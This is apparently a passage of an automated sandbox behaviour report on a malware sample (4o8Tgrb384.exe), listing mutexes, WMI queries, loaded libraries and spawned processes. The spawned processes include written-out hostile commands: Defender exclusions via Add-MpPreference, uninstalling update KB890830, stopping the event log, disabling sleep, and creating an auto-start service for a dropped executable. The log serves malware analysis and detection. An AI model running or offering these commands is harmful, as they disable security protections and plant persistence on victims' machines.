              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2512:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2232:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1612:120:WilError_03
              Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\tdgcdawemmhktkyo
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1564:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1148:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5656:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3160:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2616:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3icsgac.p4c.ps1Jump to behavior
              Source: 4o8Tgrb384.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 4o8Tgrb384.exeReversingLabs: Detection: 63%
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeFile read: C:\Users\user\Desktop\4o8Tgrb384.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\4o8Tgrb384.exe "C:\Users\user\Desktop\4o8Tgrb384.exe"
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "QVYJPHJR"
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "QVYJPHJR"
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
              Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "QVYJPHJR"Jump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "QVYJPHJR" binpath= "C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exe" start= "auto"Jump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlogJump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "QVYJPHJR"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
              Source: C:\Users\user\Desktop\4o8Tgrb384.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\zccfxwzedpps\atpljrtdlbzl.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dllJump to behavior
